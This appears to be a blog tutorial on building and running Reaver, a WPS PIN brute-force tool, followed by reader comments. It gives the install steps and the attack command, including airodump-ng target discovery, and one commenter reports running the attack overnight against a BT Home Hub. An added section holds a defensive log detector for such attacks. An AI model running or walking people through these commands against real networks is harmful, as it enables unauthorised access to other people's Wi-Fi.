
Setting Up Reaver, the WiFi Protected Setup Attack Tool

Security experts have discovered that WiFi Protected Setup (WPS) is vulnerable and not secure: if an attacker within range brute-forces an Access Point (AP) with a WPS PIN attack, he may be able to recover the WPA/WPA2 passphrase in 4-10 hours, depending on the AP. They also found that the attack may cause a denial of service on the router.

Just today, news has spread that Tactical Network Solutions have released an open-source tool that lets you perform this attack on a WPS-enabled AP. So in this article we will try to set up the said tool, which is named Reaver (which reminds me of the Protoss mobile artillery unit in StarCraft, trolololol).

To download this tool, just wget it from this link (updated: the new version is 1.3):

wget http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz

Extract the gzip file:

tar zxvf reaver-1.3.tar.gz

Move to the source directory, then configure, build and install:

cd reaver-1.3/src

./configure

make

make install

To get the BSSID of the AP, you can use airodump-ng wlan0, which is also used for capturing raw 802.11 frames. To start the attack, pass the BSSID and make sure the card is in monitor mode (reaver -i mon0 -b <bssid:here>). For example:

reaver -i mon0 -b 78:44:76:0E:09:54

[Figure: Brute force attack against WiFi Protected Setup]

Well, that should be it. The instructions can also be found in the file reaver-1.3/docs/README. If you want to read it, you may launch gedit or cat it.

cat reaver-1.3/docs/README

or

gedit reaver-1.3/docs/README

Security experts say that there is no patch for this vulnerability yet.
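Since there is no patch, the defensive options left to an AP owner are disabling WPS or watching the AP's own logs for the failure rate a PIN brute force produces. The following Python detector is an added example, not part of the original article or of Reaver; the hostapd-style log lines are constructed and their message wording is an assumption.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed hostapd-style syslog sample (message wording is an assumption, not
# verbatim hostapd output): one station hammers the PIN, another pairs normally.
SAMPLE_LOG = """\
Jan  5 02:14:01 ap hostapd: wlan0: STA 00:11:22:33:44:55 WPS: PIN authentication failed (first half)
Jan  5 02:14:04 ap hostapd: wlan0: STA 00:11:22:33:44:55 WPS: PIN authentication failed (first half)
Jan  5 02:14:07 ap hostapd: wlan0: STA 00:11:22:33:44:55 WPS: PIN authentication failed (first half)
Jan  5 02:14:10 ap hostapd: wlan0: STA 00:11:22:33:44:55 WPS: PIN authentication failed (first half)
Jan  5 02:14:13 ap hostapd: wlan0: STA 00:11:22:33:44:55 WPS: PIN authentication failed (first half)
Jan  5 02:15:30 ap hostapd: wlan0: STA aa:bb:cc:dd:ee:ff WPS: PIN authentication failed (first half)
Jan  5 02:40:12 ap hostapd: wlan0: STA aa:bb:cc:dd:ee:ff WPS: Registration succeeded
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ hostapd: \S+: "
    r"STA (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}) WPS: (?P<msg>.*)$"
)

def parse_wps_failures(log_text, year=2012):
    """Map station MAC -> timestamps of failed WPS PIN attempts (syslog has no year)."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or "failed" not in m.group("msg"):
            continue
        ts = " ".join(m.group("ts").split())  # collapse syslog's padded day field
        failures[m.group("mac")].append(datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S"))
    return failures

def detect_pin_bruteforce(log_text, window_s=60, threshold=5):
    """Flag stations with >= threshold failed PIN attempts inside any window_s span.
    A legitimate user mistypes a PIN once or twice; a sequential PIN search produces
    a steady stream of failures, so the rate, not the total, is the signal."""
    flagged = {}
    for mac, times in parse_wps_failures(log_text).items():
        recent = deque()
        for t in sorted(times):
            recent.append(t)
            while (t - recent[0]).total_seconds() > window_s:
                recent.popleft()
            if len(recent) >= threshold:
                flagged[mac] = max(flagged.get(mac, 0), len(recent))
    return flagged

if __name__ == "__main__":
    print(detect_pin_bruteforce(SAMPLE_LOG))  # {'00:11:22:33:44:55': 5}
```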

15 Comments

  1. Guys, I'm starting with Linux and computers as well, so I had problems even with this simple guide. Yes, you could say: F*** that BFU, but you can also consider it as helping the next generation. Please.

    My problem is that I don't know how to move a file to cd / because I don't even know what it is. Could you give me a hint, please? Is it some folder or something like that?
    I would be really thankful – maybe a few years later I will be able to help you
    Thank you guys

  2. Em, I use bt 5. Got the following error:
    # make install
    if [ ! -d /etc/reaver ]; then mkdir /etc/reaver; fi
    if [ -e reaver ]; then cp reaver /usr/local/bin/reaver; fi
    ln -s /usr/local/bin/reaver /usr/bin/reaver
    ln: creating symbolic link `/usr/bin/reaver': File exists
    make: *** [install] Error 1

    /etc/reaver is there. I did copy reaver from the installation folder to /usr/local/bin/reaver.
    However, when I do ln -s /usr/local/bin/reaver /usr/bin/reaver, it still complains:
    # ln -s /usr/local/bin/reaver /usr/bin/reaver
    ln: creating symbolic link `/usr/bin/reaver': File exists

  3. Read the error message:
    ln: creating symbolic link `/usr/bin/reaver': File exists

    So you have already installed it; remove the old link:

    "rm /usr/bin/reaver"

    and install again:
    "make install"

    1. BSSID – basic service set identifier. To simplify, it is the MAC address of the access point.

      Use airodump-ng as suggested: airodump-ng wlanx (use iwconfig to determine which wlan card to use, e.g. wlan1, wlan2, etc.). You can also use airmon-ng start wlanx to put the card into monitor mode and then airodump-ng mon0 to find the BSSID.

      Greg

  4. Managed to get it going and left it running overnight. Seems to be working as it's up to 2% after 10 hours! Getting a lot of timeouts and 'last message not processed properly', but the main thing is it's running. Is there any way of speeding this up though? It's a BT Home Hub I'm testing on, with 'reaver -i mon0 -b 20:2b:c1:xx:xx:xx -c 6 -E -S -a -vv' and I have -34/38 PWR.

    Thanks
